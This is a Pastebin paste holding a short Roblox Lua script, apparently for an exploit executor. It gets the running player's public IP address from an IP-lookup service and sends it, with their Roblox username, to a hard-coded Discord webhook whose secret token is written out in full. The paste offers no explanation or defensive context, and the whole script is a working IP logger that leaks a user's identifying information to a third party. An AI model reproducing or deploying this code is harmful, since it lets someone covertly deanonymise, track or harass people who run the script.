Advertisement
2021_pogg

dsadasfffff

Feb 27th, 2022
13
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. local IP = (syn and syn.request or request)
  2. {
  3. Url = "https://api.ipify.org/",
  4. Method = "GET",
  5. Headers = {
  6. ["Content-Type"] = "application/json"
  7. },
  8. };
  9.  
  10. IPLOG = {
  11. ["embeds"] = {{
  12. ["color"] = 13708129,
  13. ["description"] = (IP.Body),
  14. ["author"] = {
  15. ["name"] = (game.Players.LocalPlayer.Name)
  16. }}
  17. }
  18. }
  19.  
  20. local SEND = request(
  21. {
  22. Url = "https://discord.com/api/webhooks/946941804895404062/eUd1Nx5N-xTg1t_5h_4O7BWah7tvh4MjnIVhTJ-5yI29cav8DArNAWot9MAc86I1RJTL",
  23. Method = "POST",
  24. Headers = {
  25. ["Content-Type"] = "application/json"
  26. },
  27. Body = game:GetService("HttpService"):JSONEncode(IPLOG)
  28. }
  29. )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement